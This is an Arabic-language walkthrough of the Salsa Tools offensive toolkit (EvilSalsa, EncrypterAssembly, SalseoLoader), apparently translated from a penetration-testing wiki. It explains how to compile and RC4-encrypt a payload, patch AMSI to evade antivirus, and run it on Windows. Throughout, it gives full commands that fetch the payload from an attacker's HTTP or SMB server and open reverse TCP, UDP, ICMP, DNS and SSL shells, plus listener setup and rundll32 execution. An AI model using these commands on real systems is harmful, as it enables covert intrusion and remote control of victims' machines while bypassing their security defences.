
Salsa Tools - ShellReverse TCP/UDP/ICMP/DNS/SSL/BINDTCP/Shellcode/SILENTTRINITY و AV bypass, AMSI patched
_____ __ ______ __
/ ___/____ _/ /________ _ /_ __/___ ____ / /____
\__ \/ __ `/ / ___/ __ `/ / / / __ \/ __ \/ / ___/
___/ / /_/ / (__ ) /_/ / / / / /_/ / /_/ / (__ )
/____/\__,_/_/____/\__,_/ /_/ \____/\____/_/____/
Salsa Tools هي مجموعة من ثلاث أدوات مختلفة مجتمعة، تتيح لك الحصول على شيل عكسي معزز في أي بيئة ويندوز دون الحاجة إلى PowerShell لتنفيذه. لتجنب أحدث تقنيات الكشف (AMSI)، تمت كتابة معظم المكونات في البداية بلغة C#. تم إصدار Salsa Tools علنًا بواسطة Luis Vacas خلال محاضرته "Inmersión en la explotación tiene rima" التي أقيمت خلال h-c0n في 9 فبراير 2019.
* TCP/UDP/ICMP/DNS/BIND/SSL/Shellcode/SilentTrinity
* آمن من مضادات الفيروسات (17 فبراير)
* مصححات AMSI
* تنفيذ PowerShell
* ...
Salsa-Tools مصنوعة من ثلاثة مكونات مختلفة: - EvilSalsa - EncrypterAssembly - SalseoLoader وسلوكه كما يلي:
___ __ __ ____ _
/ _] | || || |
/ [_| | | | | | |
| _] | | | | | |___
| [_| : | | | | |
| |\ / | | | |
|_____| \_/ |____||_____|
_____ ____ _ _____ ____
/ ___/ / || | / ___/ / |
( \_ | o || | ( \_ | o |
\__ || || |___\__ || |
/ \ || _ || / \ || _ |
\ || | || \ || | |
\___||__|__||_____|\___||__|__|
[+] هذا هو الحمولة الخاصة بنا
EvilSalsa هو المكون الرئيسي في هذه الوصفة. يحتوي على الحمولة التي يتم تنفيذها على النظام كما يلي: بمجرد بدء الحمولة، يتم تشغيل System.Management.Automation.dll مما ينشئ مساحة تشغيل (runspace). داخل تلك المساحة لدينا أربعة أنواع من الشيلات (TCP / UDP / ICMP / DNS / BINDTCP / SHELLCODE / SILENTTRINITY). بمجرد تحميل EvilSalsa، أول شيء يتم التحقق من وجود c:\windows\system32\amsi.dll. إذا كان موجودًا، يتم تصحيحه باستخدام متغير معدل منزليًا من تجاوزات CyberArk و Rastamouse.
______ _
| ____| | |
| |__ _ __ ___ _ __ _ _ _ __ | |_ ___ _ __
| __| | '_ \ / __| '__| | | | '_ \| __/ _ \ '__|
| |____| | | | (__| | | |_| | |_) | || __/ |
|______|_| |_|\___|_| \__, | .__/ \__\___|_|
/\ __/ | || | | |
/ \ ___ ___ ___ _|___/|_|| |__ | |_ _
/ /\ \ / __/ __|/ _ \ '_ ` _ \| '_ \| | | | |
/ ____ \\__ \__ \ __/ | | | | | |_) | | |_| |
/_/ \_\___/___/\___|_| |_| |_|_.__/|_|\__, |
__/ |
|___/
[+] برنامج يقوم بتشفير الحمولة باستخدام RC4
[+] لدينا الإصدار بلغة بايثون والإصدار كملف exe
يمكن استخدام EncrypterAssembly كبرنامج بايثون أو كملف ثنائي exe. يقوم بتشفير EvilSalsa الذي تم إنشاؤه مسبقًا.
استخدام بايثون:
python encrypterassembly.py <FILE> <PASSWORD> <OUTPUT>
استخدام الملف القابل للتنفيذ:
Encrypterassembly.exe <FILE> <PASSWORD> <OUTPUT>
SalseoLoader هو المسؤول عن تحميل الحمولة المشفرة. يمكن تجميعه كمكتبة أو كملف قابل للتنفيذ. إذا تم تشغيله كملف قابل للتنفيذ، يجب توفير الوسائط المختارة عند تشغيل الملف. إذا تم تجميعه كمكتبة، يجب تصدير الواصف "main". تتم إضافة الوسائط باستخدام متغيرات البيئة.
_____ ____ _ _____ ___ ___
/ ___/ / || | / ___/ / _] / \
( \_ | o || | ( \_ / [_ | |
\__ || || |___\__ || _]| O |
/ \ || _ || / \ || [_ | |
\ || | || \ || || |
\___||__|__||_____|\___||_____| \___/
_ ___ ____ ___ ___ ____
| | / \ / || \ / _]| \
| | | || o || \ / [_ | D )
| |___ | O || || D || _]| /
| || || _ || || [_ | \
| || || | || || || . \
|_____| \___/ |__|__||_____||_____||__|\_|
بواسطة: CyberVaca@HackPlayers
[+] الاستخدام:
[-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseTCP LHOST LPORT
[-] SalseoLoader.exe password \\smbserver.com\evil\elfuckingmal.txt ReverseUDP LHOST LPORT
[-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseICMP LHOST
[-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseDNS LHOST ServerDNS
[-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt BindTCP LHOST LPORT
[-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseSSL LHOST LPORT
[-] SalseoLoader.exe password http://webserver.com/shellcode.txt shellcode
[-] SalseoLoader.exe password http://webserver.com/silent.txt silenttrinity URL_C2C
[+] الحمولات المتاحة:
[-] ReverseTCP [-] ReverseDNS [-] ReverseSSL [-] Shellcode
[-] ReverseUDP [-] ReverseICMP [-] BindTCP [-] SilentTrinity
قم بتنزيل الكود المصدر من GitHub وقم بتجميع EvilSalsa و SalseoLoader. ستحتاج إلى تثبيت Visual Studio لتجميع الكود.
قم بتجميع هذه المشاريع وفقًا لهندسة جهاز ويندوز الذي ستستخدمها عليه (إذا كان ويندوز يدعم x64، قم بتجميعها لتلك البنية).
يمكنك اختيار البنية داخل Visual Studio في علامة التبويب "Build" اليسرى ضمن "Platform Target".
(إذا لم تتمكن من العثور على هذه الخيارات، اضغط على "Project Tab" ثم "<اسم-المشروع> Properties")

ثم، قم ببناء كلا المشروعين (Build -> Build Solution) (داخل السجلات سيظهر مسار الملف القابل للتنفيذ):

أولاً، ستحتاج إلى ترميز ملف EvilSalsa.dll. للقيام بذلك، يمكنك استخدام النص البرمجي بايثون encrypterassembly.py أو يمكنك تجميع مشروع EncrypterAssembly
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsa.dll password evilsalsa.dll.txt
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsa.dll password evilsalsa.dll.txt
حسنًا، الآن لديك كل ما تحتاجه لتنفيذ السالسا: ملف EvilDalsa.dll المشفر وملف SalseoLoader الثنائي. قم بتحميل ملف SalseoLoader.exe إلى الجهاز. لا ينبغي أن يتم اكتشافه بواسطة أي مضاد فيروسات...
تذكر تشغيل nc كمستمع للشيل العكسي، وخادم HTTP لخدمة evilsalsa المشفرة.
SalseoLoader.exe password http://<عنوان-المهاجم>/evilsalsa.dll.txt reversetcp <عنوان-المهاجم> <المنفذ>
تذكر تشغيل nc كمستمع للشيل العكسي، وخادم SMB لخدمة evilsalsa المشفرة (impacket-smbserver).
SalseoLoader.exe password \\<عنوان-المهاجم>/folder/evilsalsa.dll.txt reverseudp <عنوان-المهاجم> <المنفذ>
قم بإعداد المستمع داخل جهاز المهاجم:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -key key.pem -cert cert.pem -port <port> -tls1
نفذ الباب الخلفي:
SalseoLoader.exe password C:/path/to/evilsalsa.dll.txt ReverseSSL <عنوان-المهاجم> <المنفذ>
هذه المرة تحتاج إلى أداة خاصة على العميل لاستقبال الشيل العكسي. قم بالتحميل: [https://github.com/inquisb/icmpsh]
تعطيل ردود ICMP:
#عند الانتهاء، يمكنك إعادة تمكينها عن طريق تشغيل:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
نفذ العميل:
python icmpsh_m.py "<عنوان-المهاجم>" "<عنوان-الضحية>"
داخل الضحية، لنقم بتشغيل السالسا:
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <عنوان-المهاجم>
افتح مشروع SalseoLoader باستخدام Visual Studio.
قبل الدالة main أضف هذا السطر: [DllExport]

Tools --> NuGet Package Manager --> Manage NuGet Packages for Solution...

ابحث عن حزمة DllExport (باستخدام علامة التبويب Browse)، ثم اضغط Install (واقبل النافذة المنبثقة)

في مجلد مشروعك ستظهر الملفات: DllExport.bat و DllExport_Configure.bat
اضغط Uninstall (نعم، إنه غريب لكن ثق بي، إنه ضروري)

فقط اخرج من Visual Studio
ثم، اذهب إلى مجلد SalseoLoader الخاص بك و نفذ DllExport_Configure.bat اختر x64 (إذا كنت ستستخدمه داخل جهاز x64، كانت هذه حالتي)، واختر System.Runtime.InteropServices (داخل Namespace for DllExport) ثم اضغط Apply

لم يعد [DllExport] معلمًا كخطأ

اختر Output Type = Class Library (Project --> SalseoLoader Properties --> Application --> Output type = Class Library)

اختر x64 platform (Project --> SalseoLoader Properties --> Build --> Platform target = x64)

لـ بناء الحل: Build --> Build Solution (داخل وحدة التحكم في الإخراج سيظهر مسار الـ DLL الجديد)
انسخ وألصق الـ DLL حيث تريد اختباره.
نفذ:
rundll32.exe SalseoLoader.dll,main
إذا لم يظهر خطأ، فمن المحتمل أن لديك DLL عاملاً!!
لا تنس استخدام خادم HTTP وتعيين مستمع nc
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
موثق بواسطة https://github.com/carlospolop-forks/